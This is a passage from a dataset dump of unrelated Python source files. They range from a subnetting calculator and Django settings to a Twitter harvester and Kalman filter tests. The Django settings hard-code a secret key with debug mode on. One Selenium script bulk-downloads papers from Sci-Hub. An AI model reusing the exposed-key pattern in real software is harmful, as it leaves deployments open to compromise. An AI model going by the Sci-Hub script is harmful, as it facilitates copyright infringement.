\n\n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"622111060","text":"import matplotlib.pyplot as plt\nfrom matplotlib.finance import quotes_historical_yahoo, candlestick\nimport unittest\n\nclass TestCandleStick(unittest.TestCase):\n def setUp(self):\n date1 = ( 2014, 2, 1)\n date2 = ( 2014, 4, 12 )\n quotes = quotes_historical_yahoo('INTC', date1, date2)\n\n if len(quotes) == 0:\n raise SystemExit\n\n fig, ax = plt.subplots()\n fig.subplots_adjust(bottom=0.2)\n #plot_day_summary(ax, quotes, ticksize=3)\n self.s = candlestick(ax, quotes, width=0.6)\n\n def test_zorder1(self):\n self.assertEqual(self.s[0][0].zorder, self.s[1][0].zorder-1)\n\n def test_zorder2(self):\n self.assertEqual(self.s[0][0].zorder, self.s[1][0].zorder-1)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"A2/tests/test_candlestickShadow.py","file_name":"test_candlestickShadow.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"376260833","text":"def quicksort(array):\n if len(array) < 2:\n return array\n else:\n piovt = array[0]\n less = [i for i in array[1:] if i <= piovt]\n greater = [i for i in array[1:] if i > piovt]\n return quicksort(less) + [piovt] + quicksort(greater)\n# print quicksort([10, 5, 2, 4])\n\ndef multip(arr):\n for i in range(len(arr)):\n print(arr[i])\n # print newArr\n\n\nmultip([2, 3, 7, 8, 10])","sub_path":"quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"591475447","text":"import time\nimport machine\nfrom micropython import mem_info\n\nprint(\"main.py running:\")\nmem_info()\n\nmsg = None\ntry:\n from machine import UART #not yet available on ESP32 port!\n print(\"Waiting for connection on UART 0...\",end=\"\")\n time.sleep(1.0)\n\n uart = machine.UART(0, 115200)# init with given baudrate\n\n uart.init(115200, bits=8, parity=None, stop=1, timeout=1000) # init with given parameters\n msg = uart.read(1)\nexcept ImportError:\n pass\n\nif msg is None:\n print(\"timed out.\")\n print(\"Loading poly_app\")\n import poly_app\nelse:\n print(msg)\n print(\"Rerouting to REPL\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"586955119","text":"#It is necessary to import from Subnet.py\n#otherwise it will not work\nfrom Subnetm import divide,clase,transform_bits2,binarySum\n\n#bubbleSort inverted\ndef sort(arr,pos):\n long=len(arr)\n while long>1:\n for x in range(long):\n y=x+1\n if(ysize):\n return \"Error; Not enough space to subnet\"\n if(2**res>size):\n done=True\n else:\n res+=1\n return res\n\n#Creates the string for the broadcast of that subnet\ndef broad(quantity):\n res=\"\"\n for x in range(len(quantity)):\n res+='1'\n return res\n\n#creates all the different combinations for the subnets\n#IP,hosts,broadcast\ndef permut(noTouch,net,id,first,last,broad):\n always=noTouch+net\n ip=transform_bits2(always+id)\n fhost=transform_bits2(always+first)\n lhost=transform_bits2(always+last)\n broadcast=transform_bits2(always+broad)\n return [ip,fhost,lhost,broadcast]\n\n#creates the mask for the Subnet using the bits dedicated for the hosts\ndef mask(host):\n mask=\"\"\n for x in range(32-host):\n mask+='1'\n for x in range(host):\n mask+='0'\n return transform_bits2(mask)\n\n#module that makes the actual subnetting\ndef root(ip,bits,unmut,large):\n unmutable=ip[:unmut]\n hostBit=calculateSize(large,bits)\n netBits=32-hostBit\n network=ip[unmut:netBits]\n ipnet=ip[netBits:]\n fhost=binarySum(ipnet,1)\n broadcast=broad(ipnet)\n lhost=binarySum(broadcast,-1)\n result=permut(unmutable,network,ipnet,fhost,lhost,broadcast)\n next=binarySum((unmutable+network+broadcast),1)\n result.append(mask(hostBit))\n result.append(netBits)\n return result,next\n\n#exports everything into a .txt for later analysis\ndef export(dictionary):\n writer=open(\"VLSM.txt\",\"w\")\n\n writer.write('\\n')\n arr=dictionary[1]\n writer.write(\"The next subnets are for the ip: \"+arr[0]+\"\\n\\n\")\n\n for x in range(1,len(dictionary)+1):\n string=\"The subnet number \"+str(x)+\":\"\n writer.write(string+\"\\n\")\n arr=dictionary[x]\n string=\"The available hosts in this subnet are:\\t\"+str(arr[6])\n writer.write(string+\"\\n\")\n string=\"Sub_ip= \"+arr[0]+\" \\tHosts= \"+arr[1]+\" - \"+arr[2]+\" \\tBroadcast= \"+arr[3]\n writer.write(string+\"\\n\" )\n string=\"The Subnet mask in decimal form is: \"+str(arr[5])+\"\\t, the subnet mask is: \"+arr[4]\n writer.write(string+\"\\n\\n\")\n\n\n writer.close()\n\n#Mastermind for the code\n#Recieves the parameters and then creates the dictionary\n#where everything is saved for later exportation\ndef vlsm(ipi,dump):\n num=[]\n sub=[]\n i=0\n for x in dump:\n if(not(x in sub)):\n sub.append(x)\n num.append(0)\n for x in sub:\n for y in dump:\n if(x==y):\n num[i]+=1\n i+=1\n if(len(sub)!=len(num)):\n print(\"Error\")\n return \"Error\"\n origin,cl=convert(ipi)\n sort(sub,num)\n unmutBits=8*cl\n usebits=32-unmutBits\n dict={}\n cont=1\n for x in range(len(sub)):\n for y in range(num[x]):\n result,origin=root(origin,usebits,unmutBits,sub[x])\n result.append(sub[x])\n dict[cont]=result\n cont+=1\n #export(dict)\n print(\"\\n\")\n for x in dict:\n arr=dict[x]\n print(\"The subnet number \"+str(x)+\":\\n\")\n print(\"The available hosts in this subnet are:\\n\"+str(arr[6])+\"\\n\")\n print(\"Sub_ip= \"+arr[0]+\" \\nHosts= \"+arr[1]+\" - \"+arr[2]+\" \\nBroadcast= \"+arr[3]+\"\\n\")\n print(\"The Subnet mask in decimal form is: \"+str(arr[5])+\"\\n, the subnet mask is: \"+arr[4]+\"\\n\\n\")\n\ndef inip():\n done=False\n while(not(done)):\n ip=input(\"What will the ip be? = \")\n if(type(divide(ip))!=str):\n done=True\n else:\n print(\"There is a problem with the ip you just gave me, try again\\n\")\n return ip\n\ndef multIn(string,arr):\n num=\"\"\n times=\"\"\n change=False\n for x in string:\n if(x!='x' and x!='*'):\n if(change):\n times+=x\n else:\n num+=x\n else:\n change=True\n num=int(num)\n times=int(times)\n for x in range(times):\n arr.append(num)\n\ndef inHost():\n sub=[]\n done=False\n while(not(done)):\n accept=True\n try:\n i=input(\"How many hosts? (type 'go' to run the algorithm) \")\n if(i==\"go\"):\n done=True\n elif('x' in i or '*' in i):\n multIn(i,sub)\n accept=False\n else:\n i=int(i)\n except ValueError:\n print(\"There has been an error with the number you introduced, try again\\n\")\n accept=False\n if(accept and not(done)):\n sub.append(i)\n return sub\n\ndef mainV():\n ip=inip()\n sub=inHost()\n vlsm(ip,sub)\n","sub_path":"toMobile/VLSMm.py","file_name":"VLSMm.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"560426863","text":"# Built-in modules\nfrom http import server\nimport ssl\n\n# Project modules\nfrom . import create_localhost_cert\nfrom ..localhttp.apirequesthandler import APIRequestHandler\nfrom ..localhttp.localserver import LocalServerHTTP\nfrom ..logger import Logger\n\n\n\nclass LocalServerHTTPS( LocalServerHTTP ):\n\n\n\tdef __init__( self, port, certfile, keyfile ):\n\t\t\"\"\"\n\t\tParameters\n\t\t----------\n\t\tport : int\n\t\t\tPort to run the local server on.\n\t\tcertfile : str\n\t\tkeyfile : str\n\t\t\"\"\"\n\n\t\tself.httpd = None\n\n\t\tif not certfile or not keyfile:\n\t\t\tcertfile, keyfile = create_localhost_cert()\n\n\t\tif not certfile or not keyfile:\n\t\t\tLogger.error( '[LocalServerHTTPS.__init__] No certfile and/or no keyfile. Cannot start HTTPS server.' )\n\t\t\treturn\n\n\t\tif hasattr( server, 'ThreadingHTTPServer' ):\n\t\t\tself.httpd = server.ThreadingHTTPServer( ( '', port ), APIRequestHandler )\n\t\telse:\n\t\t\tLogger.warn(\n\t\t\t\t'http.server.ThreadingHTTPServer not available. '\n\t\t\t\t'Using fallback to http.server.HTTPServer instead.'\n\t\t\t)\n\t\t\tself.httpd = server.HTTPServer( ( '', port ), APIRequestHandler )\n\n\t\tself.httpd.socket = ssl.wrap_socket(\n\t\t\tself.httpd.socket,\n\t\t\tcertfile = certfile,\n\t\t\tkeyfile = keyfile,\n\t\t\tserver_side = True\n\t\t)\n\n\n\tdef start( self ):\n\t\t\"\"\" Start the local server. \"\"\"\n\n\t\tif not self.httpd:\n\t\t\tLogger.error( '[LocalServerHTTPS.start] No HTTPS server running. Exiting.' )\n\t\t\treturn\n\n\t\tprint( 'A local HTTPS server will be available under: https://127.0.0.1:%d' % self.httpd.server_port )\n\t\tprint( '----------' )\n\n\t\ttry:\n\t\t\tself.httpd.serve_forever()\n\t\texcept KeyboardInterrupt:\n\t\t\tprint( '\\n----------' )\n\t\t\tLogger.info( 'Application has been terminated by user.' )\n","sub_path":"imitateapi/localhttps/localserver.py","file_name":"localserver.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"285168685","text":"import machine, neopixel\nfrom math import *\n\nnbLedRing = 20\nring = neopixel.NeoPixel(machine.Pin(22), nbLedRing)\nlum = 1\n\ndef rvbLum(r, v, b):\n return (int(lum*r), int(lum*v), int(lum*b))\n\n\n\ndef computeLedLevel( nb_dsp_led, led_num, dsp_level, tol ):\n led_val = 0.0 # Nominal value of the computed led num\n vt = 0.0 # Value of the tolerance (between led_val)\n dt_vt = 0.0 # Diference between led_val and dsp_level\n outputLevel = 0\n\n led_step = round(255 / nb_dsp_led)\n led_val = led_step * led_num # Nominal value\n vt = round( led_step * tol) # Tolerance value between led_val: => led_val +/- vt\n dt_vt = ( led_val - dsp_level)\n dt_vt = abs (dt_vt) # abs of the differance (we ignore the sign)\n dt_vt = vt -dt_vt # Substract the value of the tolerance\n if (dt_vt > 0):\n outputLevel = dt_vt /vt; \n return (outputLevel)\n\n\ndef setRing(level):\n for led in range(0, nbLedRing):\n val = computeLedLevel(nbLedRing, led, level, 2.0) * 255\n ring[led] = rvbLum(val, val, val)\n ring.write()\n","sub_path":"ledDrive.py","file_name":"ledDrive.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"55289744","text":"__author__ = 'Krishna Ajjarapu'\r\nimport sys\r\nimport csv\r\n\r\n\r\n#Assume file format as Firsname,Lastname,Contact,Email,Organization\r\n#Convert a \"comma separated values\" file to vcf contact cards\r\n\r\ndef convert_to_vcf(filename):\r\n\r\n \r\n source = open(filename,'r')\r\n dest = open('Contacts_PythonBatch_9.vcf','w')\r\n reader = csv.reader( source )\r\n n=0\r\n for row in reader:\r\n dest.write('BEGIN:VCARD' + '\\n')\r\n dest.write( 'N:' + row[0] + ';' + row[1] + \"\\n\")\r\n dest.write('TEL;CELL: '+ row[2] + '\\n')\r\n dest.write('EMAIL: '+ row[3] + '\\n')\r\n dest.write('ORG: '+ row[4] + '\\n')\r\n dest.write('END:VCARD' + '\\n')\r\n dest.write('\\n')\r\n \r\n n+=1 # Count for number of contacts\r\n dest.close()\r\n print(\"Total number of contacts coverted to vcf are: {0}\".format(n))\r\n\r\ndef main(args):\r\n if len(args)!=2:\r\n print(\"Usage:\\n\")\r\n print(\"{0} filename\".format(args[0]))\r\n return\r\n convert_to_vcf(args[1])\r\n \r\nif __name__==\"__main__\":\r\n main(sys.argv)","sub_path":"11-ConvertToVCF.py","file_name":"11-ConvertToVCF.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"405811577","text":"from tkinter import *\nfrom PIL import Image\nimport tkinter.filedialog\n\n\ndef onOpen():\n filetypes = [('All files', '*')]\n dlg = tkinter.filedialog.Open(filetypes=filetypes)\n fl = dlg.show()\n\n if fl !='':\n img = Image.open(fl)\n img = img.convert(\"L\")\n img.show()\n\n\nroot = Tk()\nroot.title(\"Black & White\")\nroot.geometry(\"300x50\")\nroot.resizable(False, False)\n\nwindowWidth = root.winfo_reqwidth()\nwindowHeight = root.winfo_reqheight()\nprint(\"Width\", windowWidth, \"Height\", windowHeight)\n\npositionRight = int(root.winfo_screenwidth() / 2 - windowWidth / 2)\npositionDown = int(root.winfo_screenheight() / 2 - windowHeight / 2)\n\nroot.geometry(\"+{}+{}\".format(positionRight, positionDown))\n\n\n\nbtn1 = Button(root, text=\"Import Image\", command=onOpen)\nbtn1.pack(padx=10, pady=5, fill=X, side=BOTTOM)\n\nroot.mainloop()","sub_path":"BlackWhiteMain.py","file_name":"BlackWhiteMain.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"572768409","text":"\"\"\"\nDjango settings for itracker project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\nfrom unipath import Path\n\nPROJECT_DIR = Path(__file__).ancestor(2)\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'y9g+ljh!j85lbhzaxc$#l!uig=r%&8-+nf(!d+4l#ekiala$3&'\n\nDEBUG = True\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n # Third-party apps\n 'django_extensions',\n 'widget_tweaks',\n 'mathfilters',\n 'tinymce',\n\n # ITracker apps\n 'apps.users',\n 'apps.projects',\n 'apps.trackers',\n 'apps.issues',\n 'apps.enumerations',\n 'apps.news',\n 'apps.time_entries',\n 'apps.journals',\n)\n\nAUTH_USER_MODEL = 'users.User'\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'core.middleware.RequiredLoginMiddleware',\n)\n\nROOT_URLCONF = 'urls'\n\nWSGI_APPLICATION = 'wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': PROJECT_DIR.child('db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nSTATIC_ROOT = PROJECT_DIR.child('static')\n\nSTATICFILES_DIRS = (\n PROJECT_DIR.child(\"assets\"),\n)\n\nTEMPLATE_DIRS = (\n PROJECT_DIR.child(\"templates\"),\n)\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = PROJECT_DIR.child('media')\n\nLOGIN_URL = '/login/'\nLOGIN_REDIRECT_URL = '/'\n\nTINYMCE_DEFAULT_CONFIG = {\n 'theme': \"advanced\",\n 'cleanup_on_startup': True,\n 'custom_undo_redo_levels': 10,\n}\nTINYMCE_COMPRESSOR = True\n","sub_path":"itracker/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"583779382","text":"import math\r\n\r\ndef isPrime(n):\r\n #checks if n is prime\r\n flag = True\r\n if n<2: #1 is a unit, not a prime\r\n flag = False\r\n elif n<4: #2,3 are primes and not 1 mod 6\r\n flag = True\r\n else: #for numbers 4 or more\r\n if n % 2 == 0 or n % 3 ==0: #this eliminates everything not a neighbor of 6\r\n flag = False\r\n else: #only neighbors of 6 left\r\n for i in range(2,int(math.floor(math.sqrt(n)))+1):\r\n if n % i ==0:\r\n flag = False\r\n break\r\n return flag\r\n\r\ndef listPrimes(n): #lists the first n primes\r\n primes = []\r\n counter = 0\r\n while len(primes) < n:\r\n if isPrime(counter):\r\n primes.append(counter)\r\n counter +=1\r\n return primes\r\n\r\n#print(isPrime(67))\r\n#print(listPrimes(10001))\r\nprint(listPrimes(10001)[-1])\r\n","sub_path":"007.py","file_name":"007.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"25156576","text":"import os\nimport argparse\nimport itertools as it\nimport collections\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\nfrom utils import configs\nfrom preprocessing import preprocess\nfrom Student import Student\nfrom LabGroup import LabGroup\nimport utils.drivers as driver\n\n\ndef _check_is_good_combo(student_combo: list, all_students: list, config) -> bool:\n r\"\"\"Checks if a given combination is valid.\n\n Criteria to check:\n (1) All students are accounted for\n (2) No student appears more than once\n (3) All lab groups have 3 <= num_members <= 5\n \"\"\"\n\n is_good = False\n\n # all students are accounted for and no student is present more than once\n if set([stud for studs in student_combo for stud in studs]) == set(all_students):\n occurrences = collections.Counter(*student_combo)\n\n # all students occur only one time\n # if student is in more that one lab group for some tup, toss it out\n # there will eventually be a tuple with student in only one lab group\n if max(occurrences.values() == 1):\n is_good = True\n # for lg_students in student_combo:\n # if len(lg_students) in config.group_sizes:\n # is_good.append(True)\n # else:\n # is_good.append(False)\n\n # result = (np.array(is_good)).all()\n # print(result)\n\n return (np.array(is_good)).all()\n\n\ndef _write_good_combos(good_combos: list, file_name, lab_groups, write_score: bool=False, score: int=0):\n r\"\"\"Writes the given time/student configurations to a specified .txt file.\"\"\"\n\n with open(file_name, \"w\") as f:\n if write_score:\n f.write(f\"Unhappiness level: {score}\\n\")\n for i, (times, combos) in enumerate(good_combos):\n title = f\"Configuration {i}\"\n f.write(f\"{title}\\n\" + (\"=\"*len(title)) + \"\\n\")\n\n for j, (time, combo) in enumerate(zip(times, combos)):\n f.write(f\"{lab_groups[i].name} ({time}): \")\n\n for stud in combo:\n f.write(f\" {stud.name}\")\n f.write(\"\\n\")\n f.write(\"\\n\"*4)\n\n\ndef _score_configuration(combination, lab_groups):\n r\"\"\"Calculates the total unhappiness for a given configuration of lab groups.\n\n Calculated as the sum of the indexes into each student's preference list of\n their actual assignment.\n \"\"\"\n\n # calculate the index offset for each student\n total_unhappiness = 0\n\n for i, lg_students in enumerate(combination):\n for stud in lg_students:\n total_unhappiness += stud.preferences.index(lab_groups[i].name)\n\n return total_unhappiness\n\n\ndef find_assignments(students, lab_groups, config):\n\n # match students with lab group times for each lab group\n for lg in lab_groups:\n lg.find_members(students)\n\n good_combos = []\n cart_prod_lg_times = [list(lg.good_times.keys()) for lg in lab_groups]\n # for elem in cart_prod_lg_times: print(f\"number of times: {len(elem)} ---> {elem}\\n\")\n # for elem in cart_prod_lg_times: print(f\"\\n{elem}\\n\")\n \n # I'm not sure if this product will work as coded (since input is list of lists)\n all_time_combos_pbar = tqdm(list(it.product(*cart_prod_lg_times)), desc=\"Going through time combinations\")\n for time_combo in all_time_combos_pbar:\n lg_students = [lg.good_times[time_combo[i]] for i, lg in enumerate(lab_groups)] # list of sets of students\n students_in_time_combo = [stud for studs in lg_students for stud in studs]\n\n # for i, elem in enumerate(students_in_time_combo): print(i, elem)\n # print()\n # for i, elem in enumerate(set(students_in_time_combo)): print(i, elem)\n\n # all students accounted for\n if set(students_in_time_combo) == set(students):\n for group_size_combo in it.combinations_with_replacement(config.group_sizes, r=len(lab_groups)):\n # print(f\"{group_size_combo} =?= {len(students)}\")\n # checksum\n if sum(group_size_combo) == len(students):\n all_student_combos = [it.combinations(lg_studs, r=group_size_combo[i]) for i, lg_studs in enumerate(lg_students)] # list of lists of lists\n\n # filter_student_combos = [student_combo for student_combo in all_student_combos if set([stud for studs in student_combo for stud in studs]) == set(students)]\n # print(f\"Total permutations: {len(list(all_student_combos[0]))} x {len(list(all_student_combos[1]))} x {len(list(all_student_combos[2]))} x {len(list(all_student_combos[3]))} x {len(list(all_student_combos[4]))}\")\n\n # check if every combination is compatible\n # all_student_combos_for_time_pbar = tqdm(list(it.product(*all_student_combos)), desc=\"Going through student configurations\", leave=False)\n for particular_student_combo in it.product(*all_student_combos):\n # print(\"\\n\"*5)\n # for combo in particular_student_combo:\n # for stud in combo:\n # print(stud.name, end=\" \")\n # print()\n if _check_is_good_combo(particular_student_combo, students, config):\n good_combos.append((time_combo, particular_student_combo))\n # all_student_combos_for_time_pbar.update()\n all_time_combos_pbar.update()\n\n # record all found combinations and compute scores\n _write_good_combos(good_combos, config.preprocess_config.data_dir/\"all_configurations.txt\", lab_groups)\n scores = [_score_configuration(lg_configurations, lab_groups) for (_, lg_configurations) in good_combos]\n\n # get best matching(s) and record results\n min_score = min(scores)\n best_scores_idx = [i for i, score in enumerate(scores) if score == min_score]\n best_combos = [good_combos[i] for i in best_scores_idx]\n _write_good_combos(best_combos, config.preprocess_config.data_dir/\"best_configurations.txt\", lab_groups, write_score=True, score=min_score)\n\n\nif __name__ == \"__main__\":\n cfg = configs.AssignmentsConfig()\n\n student_data, lab_group_data = preprocess(cfg.preprocess_config)\n\n find_assignments(student_data, lab_group_data, cfg)\n","sub_path":"src/assignments.py","file_name":"assignments.py","file_ext":"py","file_size_in_byte":6296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"368692203","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"Demo\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n\nprocess.source = cms.Source(\"PoolSource\",\n # replace 'myfile.root' with the source file you want to use\n fileNames = cms.untracked.vstring(\n #'file:/eos/uscms/store/user/qliphy/div/44CD52D2-C0FC-E111-81E6-00215E21DF18.root',\n\t\t'/store/user/qliphy/RSWW_1000_02_SIM/RSWW_1000_02_AODSIM/c8f8ed334db8a7d6f56c62266b1dfa5b/RSWW_AODSIM_189_1_ry0.root'\n )\n)\n\nprocess.demo = cms.EDAnalyzer('DiVMC')\n\n\n#process.TFileService.fileName = cms.string('new.root')\n\nOUTPUT_FILE_NAME = \"private_test.root\"\nprocess.TFileService = cms.Service(\n \"TFileService\", fileName = cms.string( OUTPUT_FILE_NAME ),\n closeFileFast = cms.untracked.bool(True)\n)\n\nprocess.options = cms.untracked.PSet(\nSkipEvent = cms.untracked.vstring('ProductNotFound')\n)\n\nprocess.p = cms.Path(process.demo)\n","sub_path":"GeneratorStudies/Central_Private_Comparison_pku/divmc_cfg.py","file_name":"divmc_cfg.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"555636351","text":"\n\nfrom xai.brain.wordbase.nouns._deathbed import _DEATHBED\n\n#calss header\nclass _DEATHBEDS(_DEATHBED, ):\n\tdef __init__(self,): \n\t\t_DEATHBED.__init__(self)\n\t\tself.name = \"DEATHBEDS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"deathbed\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_deathbeds.py","file_name":"_deathbeds.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"225132869","text":"#!/usr/bin/env python\n\nfrom __future__ import absolute_import\nimport logging\nfrom twarc import Twarc\nfrom sfmutils.harvester import BaseHarvester\n\n\nlog = logging.getLogger(__name__)\n\nQUEUE = \"twitter_rest_harvester\"\nROUTING_KEY = \"harvest.start.twitter.twitter_search\"\n\n\nclass TwitterHarvester(BaseHarvester):\n def __init__(self, process_interval_secs=1200, mq_config=None, debug=False):\n BaseHarvester.__init__(self, mq_config=mq_config, process_interval_secs=process_interval_secs, debug=debug)\n self.twarc = None\n\n def harvest_seeds(self):\n # Create a twarc\n self._create_twarc()\n\n # Dispatch message based on type.\n harvest_type = self.message.get(\"type\")\n log.debug(\"Harvest type is %s\", harvest_type)\n if harvest_type == \"twitter_search\":\n self.search()\n elif harvest_type == \"twitter_filter\":\n self.filter()\n else:\n raise KeyError\n\n def _create_twarc(self):\n self.twarc = Twarc(self.message[\"credentials\"][\"consumer_key\"],\n self.message[\"credentials\"][\"consumer_secret\"],\n self.message[\"credentials\"][\"access_token\"],\n self.message[\"credentials\"][\"access_token_secret\"])\n\n def search(self):\n incremental = self.message.get(\"options\", {}).get(\"incremental\", False)\n\n for seed in self.message.get(\"seeds\", []):\n query = seed.get(\"token\")\n # Get since_id from state_store\n since_id = self.state_store.get_state(__name__, \"{}.since_id\".format(query)) if incremental else None\n\n max_tweet_id = self._process_tweets(self.twarc.search(query, since_id=since_id))\n log.debug(\"Searching on %s since %s returned %s tweets.\", query,\n since_id, self.harvest_result.summary.get(\"tweet\"))\n\n # Update state store\n if incremental and max_tweet_id:\n self.state_store.set_state(__name__, \"{}.since_id\".format(query), max_tweet_id)\n\n def filter(self):\n assert len(self.message.get(\"seeds\", [])) == 1\n\n track = self.message[\"seeds\"][0][\"token\"]\n\n self._process_tweets(self.twarc.stream(track))\n\n def _process_tweets(self, tweets):\n max_tweet_id = None\n for count, tweet in enumerate(tweets):\n if not count % 100:\n log.debug(\"Processed %s tweets\", count)\n if self.stop_event.is_set():\n log.debug(\"Stopping since stop event set.\")\n break\n if \"text\" in tweet:\n with self.harvest_result_lock:\n max_tweet_id = max(max_tweet_id, tweet.get(\"id\"))\n self.harvest_result.increment_summary(\"tweet\")\n if \"urls\" in tweet[\"entities\"]:\n for url in tweet[\"entities\"][\"urls\"]:\n self.harvest_result.urls.append(url[\"expanded_url\"])\n if \"media\" in tweet[\"entities\"]:\n for media in tweet[\"entities\"][\"media\"]:\n self.harvest_result.urls.append(media[\"media_url\"])\n return max_tweet_id\n\n\nif __name__ == \"__main__\":\n TwitterHarvester.main(TwitterHarvester, QUEUE, [ROUTING_KEY])\n","sub_path":"twitter_harvester.py","file_name":"twitter_harvester.py","file_ext":"py","file_size_in_byte":3289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"48505261","text":"import pandas as pd\nimport time\nfrom selenium import webdriver\nimport os\nimport json\n\ndef main():\n papers = pd.read_excel('data/RPPdata.xlsx')\n dois = list(papers['DOI'].dropna())\n print(\"Starting Browser...\")\n driver = webdriver.Chrome(executable_path='C:\\\\Users\\\\Saatvik\\\\Documents\\\\ChromeDriver\\\\chromedriver.exe')\n Initial_path = 'C:\\\\Users\\\\Saatvik\\\\Downloads'\n doi_to_file_name = []\n for doi in dois:\n try:\n driver.get('https://sci-hub.tw/' + str(doi))\n driver.find_element_by_xpath('//*[@id=\"buttons\"]/ul/li/a').click()\n time.sleep(30)\n filename = max([Initial_path + \"\\\\\" + f for f in os.listdir(Initial_path)], key=os.path.getctime)\n doi_to_file_name.append({\n 'doi': doi,\n 'file': filename.split('\\\\')[-1]\n })\n except:\n print(doi, 'is giving error')\n continue\n with open('data/doi_to_file_name_data.json', 'w') as outfile:\n json.dump(doi_to_file_name, outfile)\n\n driver.close()\n\ndef put_names():\n df = pd.read_excel('data/RPPdata.xlsx')\n with open('data/doi_to_file_name_data.json') as outfile:\n data = json.load(outfile)\n new_data = []\n for i in data:\n new_data.append({\n 'doi': i['doi'],\n 'file': i['file'],\n 'title': df.loc[df['DOI'] == i['doi'], 'Study.Title.O'].values[0]\n })\n\n with open('data/doi_to_file_name_data.json', 'w') as outfile:\n json.dump(new_data, outfile)\n\n\nif __name__ == '__main__':\n put_names()\n","sub_path":"downloadPDFs.py","file_name":"downloadPDFs.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"18457319","text":"\"\"\"Tests for the linear Kalman predict step.\"\"\"\nimport json\n\nimport numpy as np\nimport pytest\nfrom numpy.testing import assert_array_almost_equal as aaae\n\nimport skillmodels.fast_routines.kalman_filters as kf\n\n# ======================================================================================\n# manual tests\n# ======================================================================================\n\n\ndef make_unique(qr_result_arr):\n long_side, m, n = qr_result_arr.shape\n for u in range(long_side):\n for j in range(n):\n if qr_result_arr[u, j, j] < 0:\n for k in range(n):\n qr_result_arr[u, j, k] *= -1\n\n\n@pytest.fixture\ndef setup_linear_predict():\n out = {}\n\n out[\"state\"] = np.array([[7, 9, 3], [8, 3, 5]])\n\n out[\"cov\"] = np.array(\n [\n [[0.3, 0, 0], [0, 0.5, 0], [0, 0, 0.9]],\n [[0.3, -0.2, -0.1], [-0.2, 0.3, -0.1], [-0.1, -0.1, 0.5]],\n ]\n )\n\n out[\"root_cov\"] = np.array(\n [\n [[0.3, 0, 0], [0, 0.5, 0], [0, 0, 0.9]],\n [[0.3, 0.2, 0.1], [0, 0.3, 0.1], [0, 0, 0.5]],\n ]\n )\n\n 